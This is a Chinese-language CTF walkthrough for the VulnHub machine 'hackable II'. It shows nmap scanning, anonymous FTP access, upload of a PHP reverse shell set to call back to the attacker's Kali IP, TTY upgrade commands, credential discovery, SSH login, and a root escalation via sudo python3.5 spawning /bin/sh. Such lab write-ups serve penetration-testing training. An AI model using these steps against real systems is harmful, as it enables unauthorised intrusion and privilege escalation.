靶机练习 No.24 Vulnhub靶机hackableII
0x00 环境安装
-
下载地址
https://www.vulnhub.com/entry/hackable-ii,711/
-
名称: hacksudo系列HackDudo
-
靶场: VulnHub.com
-
难度: 简单
-
发布时间: 2021年3月16日
-
提示信息: 无
-
目标: 2个flag
-
环境搭建
Virtual Box 启动 网卡 配置与kali 同网卡
0x01 信息收集
步骤一:ip探测
nmap -sP 192.168.56.0/24
192.168.56.115 锁定为
步骤二:端口服务识别
nmap -sC -sV -A -p- 192.168.56.115 -o port.txt
从nmap 扫描结果看出
21 ftp 可以匿名访问
22 ssh
80 http apache 2.4.18
0x02 漏洞挖掘
思路一:ftp 匿名访问
思路二:80 http服务挖掘
手工+扫描器+目录+源码+功能点
思路三:ssh爆破
测试中收集到的密码 用于爆破
步骤一:ftp匿名访问(成功)
(1) 匿名登录
ftp 192.168.56.115
anonymous
回车
回车
ls
get CALL.html
只有一个CALL.html文件 下载下来看看
(2)查看内容
一个html页面内容 先放过
步骤二:80http探测
(1)访问首页
apache 配置页面
(2)查看源码 有没有隐藏信息
发现提示目录扫描
(3)目录扫描
python3 dirsearch.py -u "http://192.168.56.115" -e "*"
(4)查看files页面
又发现 CALL.html页面
说明此处为 ftp登录后 的地方
回头看看ftp 是否可以写入文件 可以的话 可以上传马 getshell
步骤三:ftp上传马
(1)查看ftp是否拥有写权限
(2)上传 kali自带的php反弹shell的马
cd /usr/share/webshells/php/
vim /usr/share/webshells/php/php-reverse-shell.php
修改ip 为靶机可以访问到的 kali ip
(3)kali开启监听,并运行马 
网页访问文件
(4)反弹shell(成功)
只有www-data权限
步骤四:切换为完整终端(成功)
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty -a
stty raw -echo;fg
reset
步骤五:www-data 权限信息收集
(1)cat /etc/passwd
(2)/home目录下信息收集
/home 目录下存在 important.txt文件 有 读权限
读取 提示 运行 /.runme.sh 脚本
运行后
显示 密钥被破坏了
重启电脑在3秒后
重启电脑在2秒后
重启电脑在1秒后
密钥解密 得
onion
(3)/home/shrek 目录下信息收集
大多没有读权限
步骤六:ssh登录shrek用户(登录成功)
(1)尝试用收集到的密码登录shrek用户(成功)
(2)查看user.txt
0x03 提权
3.1 sudo 查看
(1)sudo -l
(root)NOPASSWD: /usr/bin/python3.5
发现 python3.5
(2)python3.5 提权(成功)
sudo python3.5 -c 'import os;os.system("/bin/sh")'